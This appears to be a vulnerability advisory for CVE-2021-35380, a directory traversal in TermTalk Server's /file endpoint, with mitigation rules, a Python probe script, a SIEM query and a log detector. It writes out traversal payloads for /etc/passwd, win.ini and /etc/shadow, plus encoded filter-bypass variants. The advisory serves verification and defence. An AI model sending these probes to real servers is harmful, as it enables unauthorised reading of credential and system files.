CVE-2021-35380

7.5 HIGH

📋 TL;DR

CVE-2021-35380 is a directory traversal vulnerability in Solari di Udine TermTalk Server (TTServer) 3.24.0.2. The file download handler exposed on the /file endpoint does not restrict the path passed in the valore parameter, so an unauthenticated attacker who can reach the HTTP service can read arbitrary files on the server with a single GET request. No credentials, user interaction or special tooling are required.

💻 Affected Systems

Products:
  • Solari di Udine TermTalk Server (TTServer)
Versions: 3.24.0.2
Operating Systems: Windows, Linux
Default Config Vulnerable: ⚠️ Yes
Notes: The vulnerability exists in the file download functionality accessible via HTTP requests to the /file endpoint.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full server takeover and lateral movement after reading files that contain secrets: service and database configuration with embedded credentials, SSH private keys, application password stores. Reading /etc/passwd by itself only confirms the bug; the damage comes from the files an attacker requests next.

🟠

Likely Case

Exfiltration of sensitive configuration files, user credentials, or proprietary data from the server.

🟢

If Mitigated

Limited impact if proper network segmentation and access controls prevent external exploitation.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: CONFIRMED
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploit code is publicly available on Exploit-DB (50638), requiring only basic HTTP request manipulation.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Advisory: https://www.swascan.com/solari-di-udine/ (published by Swascan, the reporting researchers, not by the vendor; no vendor bulletin is listed here)

Restart Required: No

Instructions:

1. Contact Solari di Udine for patch availability.
2. If a patch exists, download it from the vendor.
3. Apply the patch according to the vendor's instructions.
4. Verify the fix by repeating the traversal request described under "How to Verify".

🔧 Temporary Workarounds

Network Access Restriction

linux

Restrict access to the TTServer HTTP port to trusted source addresses only. The rules below are for a Linux host; on a Windows host apply the equivalent inbound rule in Windows Firewall. Rule order matters: with -A both rules are appended, so the ACCEPT must be added before the DROP.

# Allow the management hosts that legitimately talk to TTServer, then drop everyone else
iptables -A INPUT -p tcp --dport [TTSERVER_PORT] -s [TRUSTED_IP] -j ACCEPT
iptables -A INPUT -p tcp --dport [TTSERVER_PORT] -j DROP

Web Server Filtering

all

Place a reverse proxy or WAF in front of TTServer and reject requests to /file whose path or query contains a traversal sequence. This only helps if TTServer itself is not reachable directly (bind it to localhost or block its port as above). Match the percent-encoded and backslash forms as well as the literal ../, otherwise the filter is bypassed by ..%2f, ..%5c or %2e%2e/.

# Configure the reverse proxy (Apache/Nginx) in front of TTServer to return 403 for /file requests containing ../, ..\ or their URL-encoded forms

🧯 If You Can't Patch

  • Implement strict network segmentation to isolate TTServer from sensitive systems.
  • Deploy a web application firewall (WAF) with directory traversal protection rules.

🔍 How to Verify

Check if Vulnerable:

Send an HTTP GET request to http://[target]:[port]/file?valore=../../../etc/passwd (on a Windows host use a target such as ../../../Windows/win.ini) and check whether the file contents are returned. Use more ../ segments than you think you need; once the filesystem root is reached the extra segments are ignored.

Check Version:

Check TTServer version in application interface or configuration files; specific command depends on installation.

Verify Fix Applied:

Repeat the test request after applying fixes; it should return an error or an empty response instead of file contents. If the only mitigation is a proxy or WAF filter, also retry with encoded variants (..%2f, ..%5c, %2e%2e/) so you are testing the filter, not just its simplest rule.
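The three checks above (probe, then re-probe after the fix) can be scripted. The following is an added example written for this page; it is not the Exploit-DB module or vendor code. It assumes only the /file?valore= request shape given on this page; the signature strings used to recognise a successful read (the root entry of /etc/passwd, the section headers of win.ini) and the hostnames are assumptions for the example.

```python
"""Probe helper for CVE-2021-35380 (TermTalk Server 3.24.0.2 file download traversal).

Added example, not vendor or Exploit-DB code. Assumes the /file?valore=<path>
request shape described on this page.
"""
import re
import urllib.error
import urllib.parse
import urllib.request

# Target file per platform and the regex that proves it was actually read.
# The signatures are assumptions for this example: first line of /etc/passwd,
# standard section headers of C:\Windows\win.ini.
PROBE_TARGETS = {
    "linux":   ("etc/passwd",      re.compile(r"^root:[^:]*:0:0:", re.M)),
    "windows": ("Windows/win.ini", re.compile(r"^\[(fonts|extensions|mci extensions)\]", re.M | re.I)),
}


def build_probe_url(host, port, platform="linux", depth=6, scheme="http"):
    """Return the GET URL for the traversal probe. depth is the number of '../'
    segments; overshooting is harmless once the filesystem root is reached."""
    target, _ = PROBE_TARGETS[platform]
    valore = "../" * depth + target
    return f"{scheme}://{host}:{port}/file?valore=" + urllib.parse.quote(valore, safe="/")


def classify_response(status, body, platform="linux"):
    """'vulnerable' when the body carries the target file's signature,
    'fixed' on an error status or empty body (what this page says a fixed
    server returns), 'inconclusive' otherwise (e.g. a 200 with an HTML error page)."""
    _, signature = PROBE_TARGETS[platform]
    if status == 200 and signature.search(body):
        return "vulnerable"
    if status >= 400 or not body.strip():
        return "fixed"
    return "inconclusive"


def probe(host, port, platform="linux", timeout=5):
    """Send the probe over the network and classify the answer.
    Not exercised by the offline checks below."""
    url = build_probe_url(host, port, platform)
    req = urllib.request.Request(url, headers={"User-Agent": "cve-2021-35380-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return classify_response(resp.status, resp.read().decode("utf-8", "replace"), platform)
    except urllib.error.HTTPError as e:
        # 4xx/5xx arrive as exceptions; classify them the same way
        return classify_response(e.code, e.read().decode("utf-8", "replace"), platform)


# Constructed sample responses (not captured from a real TTServer) for an offline dry run
SAMPLE_VULNERABLE = (200, "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n")
SAMPLE_FIXED = (404, "")

if __name__ == "__main__":
    print(build_probe_url("ttserver.example.internal", 8080))          # hypothetical host
    for status, body in (SAMPLE_VULNERABLE, SAMPLE_FIXED):
        print(status, classify_response(status, body))
```

Run `probe(host, port)` against the server before and after patching; a result of "inconclusive" (a 200 carrying something other than the requested file) means the handler changed behaviour but you should read the body by hand before calling it fixed.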

📡 Detection & Monitoring

Log Indicators:

  • HTTP requests to the /file endpoint with ../ (or an encoded equivalent such as ..%2f, ..%5c, %2e%2e/) in the valore parameter
  • Bursts of /file requests for system paths (etc/passwd, Windows/win.ini, application config files) from a single external IP

Network Indicators:

  • HTTP GET requests to the TTServer port containing directory traversal sequences (../, ..\, and their percent-encoded or double-encoded forms)

SIEM Query:

source="*ttserver*" AND uri_path="/file" AND (query="*../*" OR query="*..\\*" OR query="*%2e%2e*" OR query="*..%2f*" OR query="*..%5c*")

Field names depend on the log source feeding the SIEM; the point is to match the encoded variants as well as the literal ../, since a query that only matches "*../*" misses the trivially encoded form of the same request.
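The web-server filtering workaround above and the log indicators in this section both come down to the same normalisation: decode the request (repeatedly, to catch double encoding), fold backslashes to slashes, and look for a ".." path segment. The following is an added example that does this in one helper and uses it both as a proxy/WAF decision and as a detector over access-log lines; it is not TTServer, Swascan, WAF or SIEM product code. The Common Log Format layout and the sample lines are constructed for the example, and the /file?valore= shape is the one this page describes.

```python
"""Traversal-sequence detector for the TTServer /file endpoint.

Added example, not vendor, WAF or SIEM code. One normalisation routine serves
as the reverse-proxy/WAF filter decision and as an access-log detector.
The log format (Common Log Format) and the sample lines are constructed.
"""
import re
from urllib.parse import urlsplit, unquote

# CLF: ip ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)


def normalise(value, rounds=3):
    """Percent-decode until stable (bounded, so double/triple encoding is caught),
    then fold backslashes to slashes and strip NUL bytes. After this,
    '..%5c', '%252e%252e/' and '..\\' all read as '../'."""
    prev = None
    for _ in range(rounds):
        if value == prev:
            break
        prev, value = value, unquote(value)
    return value.replace("\\", "/").replace("\x00", "")


def has_traversal(value):
    """True if any segment of the normalised value, split on path and query
    delimiters, is exactly '..'. 'a..b' and '...' are not traversal."""
    return any(seg == ".." for seg in re.split(r"[/=&?]", normalise(value)))


def is_traversal_request(target):
    """Filter decision for a proxy/WAF: reject when the request path or any
    query parameter contains a traversal sequence."""
    parts = urlsplit(target)
    return has_traversal(parts.path) or has_traversal(parts.query)


def scan_log(lines):
    """Yield (ip, timestamp, target, status) for each access-log line whose
    request target carries a traversal sequence."""
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_traversal_request(m["target"]):
            yield m["ip"], m["ts"], m["target"], int(m["status"])


# Constructed sample log lines (not captured from a real deployment)
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Jan/2022:10:01:02 +0000] "GET /file?valore=report.pdf HTTP/1.1" 200 3121',
    '203.0.113.7 - - [12/Jan/2022:10:01:05 +0000] "GET /file?valore=../../../etc/passwd HTTP/1.1" 200 1894',
    '203.0.113.7 - - [12/Jan/2022:10:01:09 +0000] "GET /file?valore=..%5c..%5c..%5cWindows%5cwin.ini HTTP/1.1" 200 92',
    '203.0.113.7 - - [12/Jan/2022:10:01:12 +0000] "GET /file?valore=%252e%252e/%252e%252e/etc/shadow HTTP/1.1" 200 701',
    '10.0.0.9 - - [12/Jan/2022:10:02:00 +0000] "GET /status HTTP/1.1" 200 52',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("traversal:", hit)
```

Of the five constructed lines only the three from 203.0.113.7 are flagged, including the backslash-encoded and double-encoded requests that a plain "*../*" match would miss. A 200 status on a flagged line is the indicator worth paging on: it means the server returned something for the traversal path rather than rejecting it.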

🔗 References
